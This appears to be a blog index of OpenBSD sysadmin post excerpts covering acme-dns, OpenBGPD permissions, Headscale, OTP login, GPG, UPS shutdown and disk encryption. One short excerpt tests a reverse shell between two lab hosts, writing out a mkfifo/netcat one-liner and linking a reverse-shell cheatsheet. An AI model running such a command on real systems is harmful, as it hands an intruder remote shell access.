OpenBSD

Acme-DNS

Web
A simplified DNS server with a RESTful HTTP API to provide a simple way to automate ACME DNS challenges. Sounds promising, right? Let's give it a try ;) https://github.com/joohoi/acme-dns
Setup: fire up a new OpenBSD VM, let's do it in London. ip: 100.10.20.30
Patch, update, add go:
doas su -
syspatch
pkg_add -Vu
pkg_add go
Clone the repo and build acme-dns:
cd /root
git clone https://github.com/joohoi/acme-dns
cd acme-dns
export GOPATH=/tmp/acme-dns
go build
cp acme-dns /usr/local/sbin/
Create a self-signed cert: the RESTful API needs a cert.

OpenBGPD - Upgrade Looking Glass

I'm running a BGP Looking Glass Server on https://bgp.stoege.net, where you can get some view of BGP running on the global Internet.
Upgrade to 7.2: did an upgrade to the latest version with my script. The upgrade was successful, but the BGP service needs a fix. The website shows "500 Internal Server Error", and the logs got a few messages like this:
tail -f /var/log/messages
Oct 21 11:38:07 bapi slowcgi[62677]: execve /cgi-bin/bgplg: Permission denied
Oct 21 11:38:07 bapi slowcgi[93993]: caught exit of unknown child 62677
Oct 21 11:38:12 bapi slowcgi[45500]: execve /cgi-bin/bgplg: Permission denied
Reapply the permissions:
chmod 0550 /var/www/cgi-bin/bgplg
chown www:daemon /var/www/cgi-bin/bgplg
chmod 0555 /var/www/bin/bgpctl
chmod 4555 /var/www/bin/ping* /var/www/bin/traceroute*
Check the service:
$ curl --head "https://bgp.

OpenBSD 7.2

OpenBSD 7.2 finally released. Yesterday, the 53rd release of OpenBSD got published, Version 7.2 (https://www.openbsd.org/72.html). I'll upgrade my boxes as usual with the following script. The most obvious change is the performance improvement for the package manager, but there is always more, see undeadly.
Upgrade Guide: as usual, follow the official Upgrade Guide. You can upgrade with a USB stick, ISO image, PXE boot or inline (from a running system).

Headscale - OpenBSD

Running Headscale Server on OpenBSD. I like and widely use WireGuard for my infrastructure. I'm also aware of its limitations and I know the Tailscale project but never gave it a try. Recently, I stumbled upon the headscale project, an open-source alternative to the (closed) Tailscale server. Perfect, let's give it a try! And, of course, I'm going to implement this with OpenBSD, what else ;)
Docs:
https://github.com/juanfont/headscale/blob/main/docs/running-headscale-openbsd.md
https://zakaria.org/posts/headscale-setup.md
On the server: compile and install the server. This is working on OpenBSD 7.

OpenBSD & OTP

I don't like SSH & password authentication. But sometimes, especially during setup or recovery, it's needed and makes sense. Thought I'll protect some boxes with OTP. Here are a few notes and instructions.
Build login_otp:
git clone https://github.com/reyk/login_otp
cd login_otp
make obj
make all
doas make install
Initialize the OTP DB:
doas otp -i
Generate a key for the user:
otp -g
Name: stoege
Key: xxxx xxxx xxxx xxxx xxxx xxxx xx
URL: otpauth://totp/stoege?secret=xxxxxxxxxxxxxxxxxxxxxxxxxx&issuer=&algorithm=SHA1&digits=6&period=30
Build the QR code:
echo "otpauth://totp/stoege?

Url Shortener for CLI

CLI URL Shortener: wrote a little URL shortener in Python with FastAPI and a wrapper script for CLI usage. Needs the httpie & jq packages. The Python backend is under development; the CLI wrappers for different OSes are right here …
Usage:
somehost$ ./myurlshort
usage: /usr/local/bin/myurlshort http://veeeeeeeeeeeeeeeeeeeeeeeeeery.long.url.to
anyhost$ ./myurlshort http://my-url-to-short.egal.world.planet.universe
https://url.stoege.net/xXxXx
CLI Wrappers, OpenBSD:
cat << 'EOF' > myurlshort
#!/usr/bin/env bash
# url shortener for openbsd, v1.0, 2022-09-12, by @stoege
which jq >/dev/null || ( echo -e "*** jq not installed ***\ndoas pkg_add jq\n"; )
which https >/dev/null || ( echo -e "*** httpie not installed ***\ndoas pkg_add httpie\n"; )
if [[ $# -ne 1 ]]; then echo -e "\nusage: $0 http://veeeeeeeeeeeeeeeeeeeeeeeeeery.

GPG & Gopass & Gitlab

GPG and how to use it. Create a key with ECC:
gpg --expert --full-generate-key
(9) ECC and ECC
(1) Curve 25519
0 = key does not expire (or whatever you prefer!)
Real name: Max Muster
Email address: max@muster.net
Comment: -
pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid Max Muster (-) <max@muster.net>
sub cv25519 2022-09-04 [E]
Public key:
max@host $ gpg
/home/max/.gnupg/pubring.kbx
----------------------------
pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E
uid [ultimate] Max Muster (-) <max@muster.

OpenBSD - ReverseShell

Reverse Shells
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://kb.systemoverlord.com/security/postex/reverse/
Test it. Listen on Host A: set a listener on Host A (192.168.1.100)
hostA # nc -l 4242
Start the reverse shell on Host B:
hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f
Here we are:
hostA # hostname
hostA.somewhere
hostA # nc -l 4242
hostB # hostname
hostB.somewhere
nice ;)
Any comments?

Sensorsd - UPS Shutdown

Shutdown hosts on power outages. Everybody is talking about power outages. Let's assume you have a Smart-UPS for your playground and you'd like to shut down some infrastructure to avoid troubles with corrupt filesystems, broken VMs and things like that. Connect the UPS to the APU via USB cable; dmesg shows the UPS connected:
APU# dmesg
uhidev0 at uhub0 port 3 configuration 1 interface 0 "American Power Conversion Smart-UPS_1500 ...
uhidev0: iclass 3/0, 142 report ids
upd0 at uhidev0
uhid0 at uhidev0 reportid 1: input=0, output=0, feature=1
uhid1 at uhidev0 reportid 2: input=0, output=0, feature=1 .

OpenBSD - Full Disk Encryption

Intro: I never used the full disk encryption feature as there was no need for it. It doesn't make sense for hosted VMs, as you have to enter the passphrase at every boot at the console. So it's a pain and still possible to intercept on the hoster's infrastructure. Disk encryption does not make sense at home, as all my devices remain at home (and hopefully never get stolen). It would make sense on a notebook, but I'm more the Apple fanboy when it comes to portable machines.